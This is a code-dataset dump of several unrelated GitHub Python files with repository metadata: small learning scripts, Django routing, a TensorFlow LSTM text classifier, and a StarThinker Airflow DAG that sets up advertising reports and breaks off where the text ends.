# newlist.append(index)
#print(newlist)
| [
"noreply@github.com"
] | amandaabalos.noreply@github.com |
5363f8ba50ad1f40740df80389c67d2c9e4ba339 | 13befacd26854ae85b640755ac49c935378cb55e | /keras12_split.py | fecb247fda0dc45f50c2a0ef77a4e4d88b2db5f6 | [] | no_license | sunho-park/bitcamp | 4ed7102aa2443223e3e44f39a51a63db9236e153 | b3c1568d893b1f52ac8e9d2146c426d0d27e3124 | refs/heads/master | 2022-07-12T18:30:59.936394 | 2020-05-14T10:20:53 | 2020-05-14T10:20:53 | 263,186,465 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py |
#1. 데이터
import numpy as np
x=np.array(range(1, 101))
y=np.array(range(101, 201))
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=66, test_size=0.3)
#x, y, random_state=99, shufle=True, test_size=0.4
x_val, x_test, y_val, y_test = train_test_split(x_test, y_test, random_state=66, test_size=0.66)
#x_test, y_test, random_state=99, test_size=0.5
# x_train = x[:60] #0~59
# x_val = x[60:80] #60~79
# x_test = x[80:] #80~66
# y_train = x[:60]
# y_val = x[60:80]
# y_test = x[80:]
print("x_train = ", x_train)
# print("y_train = ", y_train)
print("x_test = ", x_test)
print("x_val = ", x_val)
# print("y_val = ", y_val)
# print("y_test = ", y_test)
'''
# 2. 모델구성
from keras.models import Sequential
from keras.layers import Dense
# Sequential 함수를 model 로 하겠다.
model = Sequential()
model.add(Dense(5, input_dim=1)) #1~100의 한 덩어리?
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(10))
model.add(Dense(1))
# 3. 훈련
model.compile(loss='mse', optimizer='adam', metrics=['mse'])
model.fit(x_train, y_train, epochs=100, batch_size=1, validation_data = (x_val, y_val)) #훈련용 데이터로 훈련
# 4. 평가, 예측
loss, mse = model.evaluate(x_test, y_test, batch_size=1) #훈련용 데이터와 평가용 데이터를 분리해야함
print("loss : ", loss)
print("mse = ", mse)
y_predict = model.predict(x_test)
print("y_predict : \n", y_predict)
from sklearn.metrics import mean_squared_error
def RMSE(y_test, y_predict):
return np.sqrt(mean_squared_error(y_test, y_predict))
print("RMSE : ", RMSE(y_test, y_predict))
# R2 구하기
from sklearn.metrics import r2_score
r2 = r2_score(y_test, y_predict)
print("r2 : ", r2) #회귀모형''' | [
"noreply@github.com"
] | sunho-park.noreply@github.com |
4b0f1007791423a5089472301bb2d177f4c91298 | b19ea34b8794406e23625d95c2cb64db4b792e8e | /ca_camera/urls.py | ef142cdf207c490ca363921dc0654090b5e8de1b | [] | no_license | yabu4696/dep-django | b9a398cae47528d8e30d2d70943a13fdcf42e234 | 4dfc866773fe45fb4de647eea90aba4e3cb86c07 | refs/heads/main | 2023-04-01T00:23:32.782654 | 2021-03-16T05:31:49 | 2021-03-16T05:31:49 | 343,222,493 | 0 | 0 | null | 2021-03-04T21:07:56 | 2021-02-28T21:49:32 | Python | UTF-8 | Python | false | false | 908 | py | from django.urls import path
from . import views
app_name = 'ca_camera'
urlpatterns = [
# path('rayout',views.rayout,name='rayout'),
path('', views.index, name='index'),
path('item/<slug:slug>', views.detail, name='detail'),
# path('form', views.form, name='form'),
path('delete', views.delete, name='delete'),
# path('reload/',views.reload, name='reload'),
# path('item/<slug:slug>/edit', views.edit,name='edit'),
path('item/<slug:slug>/exclusion', views.exclusion, name='exclusion'),
# path('item/<slug:slug>/reload_one', views.reload_one, name='reload_one'),
path('maker_index',views.maker_index, name='maker_index'),
path('maker/<slug:slug>', views.maker_detail, name='maker_detail'),
# path('celery_test/', views.celery_test, name='celery_test'),
path('contact', views.contact, name='contact'),
path('contact/done', views.done, name='done'),
] | [
"shiroro.96646@gmail.com"
] | shiroro.96646@gmail.com |
8fdad3afb1678adeb07f91d11ed5846b44b35a03 | b67900795d7facd9c1fd0b74f5747a1fa56d9e6d | /split_string.py | c86df46221c9f4530c4436387d6aceae2380ab0c | [] | no_license | pinkrespect/HappyHappyAlgorithm | 438c4b711c87f487bcbf0a6306e3bd9b871c620b | b5d91d0abc7c8a46f89a6cd0d7b97d6244261206 | refs/heads/master | 2020-06-20T19:04:44.979709 | 2019-11-10T09:59:30 | 2019-11-10T09:59:30 | 197,216,870 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | string = input()
for x in range(len(string)):
if x % 10 == 0:
print(string[:10])
string = string[10:]
elif len(string) < 10:
print(string[0:])
break
| [
"pinkrespect@jj.ac.kr"
] | pinkrespect@jj.ac.kr |
2b40b04c096bfb3e64fa6e0f0d91a73aa511b6f5 | 0d7b9ecc3ef7f20d538753adf537797f50e657df | /linkedlist.py | 00be4bbe159a43a535b7d3f62075884964a8ce51 | [] | no_license | tanurag2000/python_playground | 2d1f41fcc17bb2e571514579c2e216767909e6f7 | 7de51ebbfaaec963ee78f04c8db710737a55eb14 | refs/heads/main | 2023-07-27T21:51:04.180669 | 2021-09-16T00:12:49 | 2021-09-16T00:12:49 | 389,365,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 749 | py | class Node:
def __init__(self,data):
self.data=data
self.next=None
class linkedlist:
def __init__(self):
self.head=None
def push(self,new_data):
new_node=Node(new_data)
new_node.next=self.head
self.head=new_node
def pushend(self,prev_node,new_data):
if prev_node is None:
pirnt("error")
new_node=Node(new_data)
new_node.next=prev_node.next
prev_node.next=new_node
def printlist(self):
temp=self.head
while(temp):
print(temp.data)
temp=temp.next
l=linkedlist()
for i in range(5):
i=input()
l.push(i)
l.pushend(l.head.next,7)
l.printlist()
| [
"noreply@github.com"
] | tanurag2000.noreply@github.com |
3fd05c5ff2b6a3c8ce35d7290562accc3dc89df1 | 3d3a319af377fbac0e3a67c09ca2dc363ea82ac0 | /weapon.py | ce3746a14bfef4bf963b0dbd1a69889e1ef38db4 | [] | no_license | ken12321/room-algorithm | e0d5848c8a6d0574a25bd6f1e8b3b0bfae35ac27 | a9854363995767802b809ff380e1f3e827d04c02 | refs/heads/main | 2023-07-09T16:45:15.965272 | 2021-08-11T04:50:08 | 2021-08-11T04:50:08 | 380,092,287 | 0 | 0 | null | 2021-08-05T07:54:00 | 2021-06-25T01:29:52 | Python | UTF-8 | Python | false | false | 183 | py | import constants
class Weapon:
def __init__(self, name, description, damage):
self.name = name
self.description = description
self.damage = damage
| [
"ken.l.h23@gmail.com"
] | ken.l.h23@gmail.com |
f2586b39d392483dff52b21fbeceeb9f9ad54cf6 | e3aad9a7978f361bdd22706b34f587d885cda2a6 | /modules/rnn_classifier.py | 5d856db8bb4ec023182ad89bbd7f4199b85e85c9 | [] | no_license | ufukcbicici/WebPageCategorization | 1c8e27c7807bc50208736a1c40900b9fb749f8da | 30355cf5680c20d5c94b4770103cb67012581f98 | refs/heads/master | 2022-11-15T15:49:17.445369 | 2020-07-07T21:18:21 | 2020-07-07T21:18:21 | 277,296,662 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,122 | py | import tensorflow as tf
import os
import pathlib
import numpy as np
import pickle
from sklearn.metrics import classification_report
from collections import Counter
# from auxillary.db_logger import DbLogger
# from global_constants import GlobalConstants, DatasetType
# from model.deep_classifier import DeepClassifier
from modules.constants import GlobalConstants
from modules.db_logger import DbLogger
from modules.deep_classifier import DeepClassifier
class RnnClassifier(DeepClassifier):
def __init__(self, corpus, classifier_name):
super().__init__(corpus, classifier_name)
self.initial_state = None
self.initial_state_fw = None
self.initial_state_bw = None
self.finalLstmState = None
self.outputs = None
self.attentionMechanismInput = None
self.contextVector = None
self.alpha = None
self.finalState = None
self.temps = []
def get_embeddings(self):
super().get_embeddings()
# FC Layers
self.inputs = tf.layers.dense(self.inputs, GlobalConstants.DENSE_INPUT_DIMENSION, activation=tf.nn.relu)
if GlobalConstants.USE_INPUT_DROPOUT:
self.inputs = tf.nn.dropout(self.inputs, keep_prob=self.keep_prob)
@staticmethod
def get_stacked_lstm_cells(hidden_dimension, num_layers):
cell_list = [tf.contrib.rnn.LSTMCell(hidden_dimension,
forget_bias=1.0,
state_is_tuple=True) for _ in range(num_layers)]
cell = tf.contrib.rnn.MultiRNNCell(cell_list, state_is_tuple=True)
return cell
def get_classifier_structure(self):
num_layers = GlobalConstants.NUM_OF_LSTM_LAYERS
if not GlobalConstants.USE_BIDIRECTIONAL_LSTM:
cell = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
# Add dropout to cell output
cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob)
self.initial_state = cell.zero_state(self.batch_size, dtype=tf.float32)
# Dynamic LSTM
with tf.variable_scope('LSTM'):
self.outputs, state = tf.nn.dynamic_rnn(cell,
inputs=self.inputs,
initial_state=self.initial_state,
sequence_length=self.sequence_length)
final_state = state
self.finalLstmState = final_state[num_layers - 1].h
else:
cell_fw = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
cell_bw = RnnClassifier.get_stacked_lstm_cells(hidden_dimension=GlobalConstants.LSTM_HIDDEN_LAYER_SIZE,
num_layers=num_layers)
# Add dropout to cell output
cell_fw = tf.contrib.rnn.DropoutWrapper(cell_fw, output_keep_prob=self.keep_prob)
cell_bw = tf.contrib.rnn.DropoutWrapper(cell_bw, output_keep_prob=self.keep_prob)
# Init states
self.initial_state_fw = cell_fw.zero_state(self.batch_size, dtype=tf.float32)
self.initial_state_bw = cell_bw.zero_state(self.batch_size, dtype=tf.float32)
# Dynamic Bi-LSTM
with tf.variable_scope('Bi-LSTM'):
self.outputs, state = tf.nn.bidirectional_dynamic_rnn(cell_fw,
cell_bw,
inputs=self.inputs,
initial_state_fw=self.initial_state_fw,
initial_state_bw=self.initial_state_bw,
sequence_length=self.sequence_length)
final_state_fw = state[0][num_layers - 1]
final_state_bw = state[1][num_layers - 1]
self.finalLstmState = tf.concat([final_state_fw.h, final_state_bw.h], 1)
if GlobalConstants.USE_ATTENTION_MECHANISM:
self.add_attention_mechanism()
else:
self.finalState = self.finalLstmState
def add_attention_mechanism(self):
if GlobalConstants.USE_BIDIRECTIONAL_LSTM:
forward_rnn_outputs = self.outputs[0]
backward_rnn_outputs = self.outputs[1]
self.attentionMechanismInput = tf.concat([forward_rnn_outputs, backward_rnn_outputs], axis=2)
else:
self.attentionMechanismInput = self.outputs
with tf.variable_scope('Attention-Model'):
hidden_state_length = self.attentionMechanismInput.get_shape().as_list()[-1]
self.contextVector = tf.Variable(name="context_vector",
initial_value=tf.random_normal([hidden_state_length], stddev=0.1))
w = self.contextVector
H = self.attentionMechanismInput
M = tf.tanh(H)
M = tf.reshape(M, [-1, hidden_state_length])
w = tf.reshape(w, [-1, 1])
pre_softmax = tf.reshape(tf.matmul(M, w), [-1, self.max_sequence_length])
zero_mask = tf.equal(pre_softmax, 0.0)
replacement_tensor = tf.fill([self.batch_size, self.max_sequence_length], -1e100)
masked_pre_softmax = tf.where(zero_mask, replacement_tensor, pre_softmax)
self.alpha = tf.nn.softmax(masked_pre_softmax)
r = tf.matmul(tf.transpose(H, [0, 2, 1]),
tf.reshape(self.alpha, [-1, self.max_sequence_length, 1]))
# r = tf.squeeze(r)
r = r[:, :, 0]
h_star = tf.tanh(r)
h_drop = tf.nn.dropout(h_star, self.keep_prob)
self.finalState = h_drop
self.temps.append(pre_softmax)
self.temps.append(zero_mask)
self.temps.append(masked_pre_softmax)
def get_softmax_layer(self):
hidden_layer_size = GlobalConstants.LSTM_HIDDEN_LAYER_SIZE
num_of_classes = self.corpus.get_num_of_classes()
# Softmax output layer
with tf.name_scope('softmax'):
if not GlobalConstants.USE_BIDIRECTIONAL_LSTM:
softmax_w = tf.get_variable('softmax_w', shape=[hidden_layer_size, num_of_classes], dtype=tf.float32)
elif GlobalConstants.USE_BIDIRECTIONAL_LSTM:
softmax_w = tf.get_variable('softmax_w', shape=[2 * hidden_layer_size, num_of_classes],
dtype=tf.float32)
else:
raise NotImplementedError()
softmax_b = tf.get_variable('softmax_b', shape=[num_of_classes], dtype=tf.float32)
# self.l2_loss += tf.nn.l2_loss(softmax_w)
# self.l2_loss += tf.nn.l2_loss(softmax_b)
self.logits = tf.matmul(self.finalState, softmax_w) + softmax_b
self.posteriors = tf.nn.softmax(self.logits)
self.predictions = tf.argmax(self.posteriors, 1, name='posteriors')
def train(self, **kwargs):
target_category = kwargs["target_category"]
sess = kwargs["session"]
run_id = DbLogger.get_run_id()
explanation = RnnClassifier.get_explanation()
DbLogger.write_into_table(rows=[(run_id, explanation)], table=DbLogger.runMetaData, col_count=2)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
file_path = pathlib.Path(__file__).parent.absolute()
model_folder = os.path.join(file_path, "..", "models", target_category)
if not os.path.exists(model_folder):
os.makedirs(model_folder)
losses = []
for iteration in range(GlobalConstants.ITERATION_COUNT):
sequences_arr, seq_lengths, labels_arr = self.corpus.get_training_batch(target_category=target_category)
feed_dict = {self.batch_size: sequences_arr.shape[0],
self.input_x: sequences_arr,
self.input_y: labels_arr,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths,
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.optimizer, self.mainLoss]
results = sess.run(run_ops, feed_dict=feed_dict)
losses.append(results[1])
iteration += 1
if iteration % 10 == 0:
avg_loss = np.mean(np.array(losses))
losses = []
print("Iteration:{0} Avg Loss:{1}".format(iteration, avg_loss))
if iteration % 100 == 0:
checkpoint_folder = os.path.join(model_folder, "lstm{0}_iteration{1}".format(run_id, iteration))
path = os.path.join(checkpoint_folder, "lstm{0}_iteration{1}.ckpt".format(run_id, iteration))
saver.save(sess, path)
def test(self, **kwargs):
target_category = kwargs["target_category"]
batch_size = kwargs["batch_size"]
data_type = kwargs["data_type"]
sess = kwargs["session"]
file_path = pathlib.Path(__file__).parent.absolute()
model_folder = os.path.join(file_path, "..", "models")
all_posteriors = []
all_ground_truths = []
doc_id = 0
for sequences_arr, seq_lengths, labels_arr in \
self.corpus.get_document_sequences(target_category=target_category, data_type=data_type):
batch_id = 0
doc_ground_truths = []
doc_posteriors = []
while batch_id < sequences_arr.shape[0]:
seq_batch = sequences_arr[batch_id:batch_id + batch_size]
feed_dict = {self.batch_size: seq_batch.shape[0],
self.input_x: seq_batch,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths[batch_id:batch_id + batch_size],
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.posteriors]
results = sess.run(run_ops, feed_dict=feed_dict)
doc_ground_truths.append(labels_arr[batch_id:batch_id + batch_size])
doc_posteriors.append(results[0])
batch_id += batch_size
assert len(doc_posteriors) == len(doc_ground_truths)
if len(doc_posteriors) == 0:
continue
all_posteriors.append(np.concatenate(doc_posteriors, axis=0))
all_ground_truths.append(np.concatenate(doc_ground_truths, axis=0))
print("\rProcessing document:{0}".format(doc_id), end="")
doc_id += 1
if doc_id % 1000 == 0:
assert len(all_posteriors) == len(all_ground_truths)
y = np.concatenate(all_ground_truths)
y_hat = np.argmax(np.concatenate(all_posteriors, axis=0), axis=1)
report = classification_report(y_true=y, y_pred=y_hat, target_names=["Other", target_category])
print(report)
model_file = open(os.path.join(model_folder, "{0}_ground_truths.sav".format(data_type)), "wb")
pickle.dump(all_ground_truths, model_file)
model_file.close()
model_file = open(os.path.join(model_folder, "{0}_posteriors.sav".format(data_type)), "wb")
pickle.dump(all_posteriors, model_file)
model_file.close()
def analyze_documents(self, sess, documents, batch_size):
all_posteriors = []
for sequences_arr, seq_lengths, labels_arr in \
self.corpus.get_document_sequences(target_category=None, data_type=None, outside_documents=documents):
batch_id = 0
doc_posteriors = []
while batch_id < sequences_arr.shape[0]:
seq_batch = sequences_arr[batch_id:batch_id + batch_size]
feed_dict = {self.batch_size: seq_batch.shape[0],
self.input_x: seq_batch,
self.keep_prob: GlobalConstants.DROPOUT_KEEP_PROB,
self.sequence_length: seq_lengths[batch_id:batch_id + batch_size],
self.max_sequence_length: GlobalConstants.MAX_SEQUENCE_LENGTH}
run_ops = [self.posteriors]
results = sess.run(run_ops, feed_dict=feed_dict)
doc_posteriors.append(results[0])
batch_id += batch_size
if len(doc_posteriors) == 0:
continue
all_posteriors.append(np.concatenate(doc_posteriors, axis=0))
return all_posteriors
| [
"ufukcbicici@yahoo.com"
] | ufukcbicici@yahoo.com |
ae6dccb3f41dacf3ab006321ca502a67ca354237 | 15ab83191e9aeb58433d578582d8c24ecd68bbaf | /backend/manage.py | 7ecd4a62b90eeb57c918b2b0eab5d8f0c9e39ac1 | [] | no_license | crowdbotics-apps/ecommerce-27317 | 6b36638113b5e64c537ef3e1e674132dd4c21bae | 1f2e00366e112aa3acf74362fba31af42c5589c1 | refs/heads/master | 2023-05-01T22:50:02.897152 | 2021-05-24T11:58:30 | 2021-05-24T11:58:30 | 370,334,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommerce_27317.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
6ce0ce9329100d7ed43836b2f9739fe6cd516d45 | 8ae7e5f4805c7333f087d193725c87bee16efd2f | /dags/itp_dag.py | d5975edc9aab580ce625de161f7e8fa9dcc74638 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | hernanperalta/starthinker | 816b59f65db0d907db84ccad499a89871ecdb385 | 89d50bc56e1d2b05003c644aa07fdf697c6e9fad | refs/heads/master | 2022-10-12T07:03:11.812525 | 2020-06-02T16:18:34 | 2020-06-02T16:18:34 | 267,911,855 | 0 | 0 | Apache-2.0 | 2020-05-29T17:04:04 | 2020-05-29T17:04:03 | null | UTF-8 | Python | false | false | 27,785 | py | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
'''
--------------------------------------------------------------
Before running this Airflow module...
Install StarThinker in cloud composer from open source:
pip install git+https://github.com/google/starthinker
Or push local code to the cloud composer plugins directory:
source install/deploy.sh
4) Composer Menu
l) Install All
--------------------------------------------------------------
Browser Activity Dashboard ( 2019 )
Visualizes a client's Campaign Manager and DV360 activity by browser and device
Wait for <b>BigQuery->StarThinker Data->UNDEFINED->*</b> to be created.
Join the <a hre='https://groups.google.com/d/forum/starthinker-assets' target='_blank'>StarThinker Assets Group</a> to access the following assets
For each of the following copy and connect to the new BigQuery sources above. See <a href='https://docs.google.com/document/d/11NlVWzbw6UeSUVUeNuERZGU9FYySWcRbu2Fg6zJ4O-A/edit?usp=sharing' target='_blank'>detailed instructions</a>.
Copy <a href='https://datastudio.google.com/open/1lxRWIs3ozzWs4-9WTy3EcqMcrtYn-7nI' target='_blank'>Combined_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1CeOHxxo-yAAMWcjI1ALsu_Dv-u2W78Rk' target='_blank'>DV360_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1NlN8rel--3t9VtTuA_0y2c6dcmIYog5g' target='_blank'>CM_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1-mGW74gnWu8zKejBhfLvmgro5rlpVNkE' target='_blank'>Floodlight_Browser_Delivery</a>.
Copy <a href='https://datastudio.google.com/open/1ftGTV0jaHKwGemhSgKOcoesuWzf4Jcwd' target='_blank'>Browser Delivery Report</a>.
When prompted choose the new data sources you just created.
Or give these intructions to the client.
'''
from starthinker_airflow.factory import DAG_Factory
# Add the following credentials to your Airflow configuration.
USER_CONN_ID = "starthinker_user" # The connection to use for user authentication.
GCP_CONN_ID = "starthinker_service" # The connection to use for service authentication.
# User-editable recipe parameters; values are filled in when the DAG is deployed.
INPUTS = {
  'dataset': '',  # Place where tables will be written in BigQuery.
  'recipe_timezone': 'America/Los_Angeles',  # Timezone for report dates.
  'dcm_account': '',  # CM account id of client.
  'dcm_advertisers': [],  # Comma delimited list of CM advertiser ids.
  'dcm_floodlight': '',  # CM floodlight configuration id.
  'dbm_partners': [],  # DV360 partner id.
  'dbm_advertisers': [],  # Comma delimited list of DV360 advertiser ids.
}
TASKS = [
{
'dataset': {
'auth': 'service',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'Report suffix and BigQuery dataset to contain data.'
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'filters': {
'dfa:advertiser': {
'values': {
'field': {
'name': 'dcm_advertisers',
'kind': 'integer_list',
'order': 3,
'default': [
],
'description': 'Comma delimited list of CM advertiser ids.'
}
}
}
},
'body': {
'type': 'STANDARD',
'format': 'CSV',
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Delivery_',
'description': 'Report in CM, should be unique.'
}
},
'accountId': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'criteria': {
'dateRange': {
'relativeDateRange': 'LAST_365_DAYS'
},
'dimensions': [
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiser'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiserId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaign'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaignId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:site'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:browserPlatform'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:platformType'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:date'
}
],
'metricNames': [
'dfa:impressions',
'dfa:clicks',
'dfa:activityViewThroughConversions',
'dfa:activityClickThroughConversions'
]
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Delivery_',
'description': 'Report in CM, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'CM_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'body': {
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Floodlight_',
'description': 'Report in CM, should be unique.'
}
},
'type': 'FLOODLIGHT',
'format': 'CSV',
'accountId': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'floodlightCriteria': {
'dateRange': {
'relativeDateRange': 'LAST_60_DAYS'
},
'dimensions': [
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiser'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:advertiserId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaign'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:campaignId'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:date'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:browserPlatform'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:platformType'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:activity'
},
{
'kind': 'dfareporting#sortedDimension',
'name': 'dfa:activityId'
}
],
'floodlightConfigId': {
'dimensionName': 'dfa:floodlightConfigId',
'kind': 'dfareporting#dimensionValue',
'matchType': 'EXACT',
'value': {
'field': {
'name': 'dcm_floodlight',
'kind': 'integer',
'order': 4,
'default': '',
'description': 'CM floodlight configuration id.'
}
}
},
'metricNames': [
'dfa:activityClickThroughConversions',
'dfa:activityViewThroughConversions',
'dfa:totalConversions'
],
'reportProperties': {
'includeUnattributedCookieConversions': True,
'includeUnattributedIPConversions': False
}
}
}
}
}
},
{
'dcm': {
'auth': 'user',
'report': {
'account': {
'field': {
'name': 'dcm_account',
'kind': 'integer',
'order': 2,
'default': '',
'description': 'CM account id of client.'
}
},
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'CM_Browser_Floodlight_',
'description': 'Report in CM, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'CM_Browser_Floodlight',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
}
}
}
},
{
'dbm': {
'auth': 'user',
'report': {
'filters': {
'FILTER_PARTNER': {
'values': {
'field': {
'name': 'dbm_partners',
'kind': 'integer_list',
'order': 5,
'default': [
],
'description': 'DV360 partner id.'
}
}
},
'FILTER_ADVERTISER': {
'values': {
'field': {
'name': 'dbm_advertisers',
'kind': 'integer_list',
'order': 6,
'default': [
],
'description': 'Comma delimited list of DV360 advertiser ids.'
}
}
}
},
'body': {
'timezoneCode': {
'field': {
'name': 'recipe_timezone',
'kind': 'timezone',
'description': 'Timezone for report dates.',
'default': 'America/Los_Angeles'
}
},
'metadata': {
'title': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'DV360_Browser_Delivery_',
'description': 'Name of report in DV360, should be unique.'
}
},
'dataRange': 'LAST_365_DAYS',
'format': 'CSV'
},
'params': {
'type': 'TYPE_GENERAL',
'groupBys': [
'FILTER_ADVERTISER',
'FILTER_BROWSER',
'FILTER_MEDIA_PLAN',
'FILTER_DATE',
'FILTER_DEVICE_TYPE',
'FILTER_INSERTION_ORDER',
'FILTER_PAGE_LAYOUT'
],
'metrics': [
'METRIC_IMPRESSIONS',
'METRIC_CLICKS',
'METRIC_LAST_CLICKS',
'METRIC_LAST_IMPRESSIONS',
'METRIC_REVENUE_ADVERTISER',
'METRIC_MEDIA_COST_ADVERTISER'
]
}
}
}
}
},
{
'dbm': {
'auth': 'user',
'report': {
'name': {
'field': {
'name': 'dataset',
'kind': 'string',
'prefix': 'DV360_Browser_Delivery_',
'description': 'DV360 report name, should be unique.'
}
}
},
'out': {
'bigquery': {
'table': 'DV360_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
},
'schema': [
{
'name': 'Advertiser',
'type': 'STRING'
},
{
'name': 'Advertiser_ID',
'type': 'INTEGER'
},
{
'name': 'Advertiser_Status',
'type': 'STRING'
},
{
'name': 'Advertiser_Integration_Code',
'type': 'STRING'
},
{
'name': 'Browser',
'type': 'STRING'
},
{
'name': 'Campaign',
'type': 'STRING'
},
{
'name': 'Campaign_ID',
'type': 'INTEGER'
},
{
'name': 'Report_Day',
'type': 'DATE'
},
{
'name': 'Device_Type',
'type': 'STRING'
},
{
'name': 'Insertion_Order',
'type': 'STRING'
},
{
'name': 'Insertion_Order_ID',
'type': 'INTEGER'
},
{
'name': 'Insertion_Order_Status',
'type': 'STRING'
},
{
'name': 'Insertion_Order_Integration_Code',
'type': 'STRING'
},
{
'name': 'Environment',
'type': 'STRING'
},
{
'name': 'Advertiser_Currency',
'type': 'STRING'
},
{
'name': 'Impressions',
'type': 'INTEGER'
},
{
'name': 'Clicks',
'type': 'INTEGER'
},
{
'name': 'Post_Click_Conversions',
'type': 'FLOAT'
},
{
'name': 'Post_View_Conversions',
'type': 'FLOAT'
},
{
'name': 'Revenue_Adv_Currency',
'type': 'FLOAT'
},
{
'name': 'Media_Cost_Advertiser_Currency',
'type': 'FLOAT'
}
]
}
}
}
},
{
'bigquery': {
'auth': 'service',
'to': {
'table': 'Floodlight_Browser_Delivery',
'dataset': {
'field': {
'name': 'dataset',
'kind': 'string',
'order': 1,
'default': '',
'description': 'BigQuery dataset to contain data.'
}
}
},
'from': {
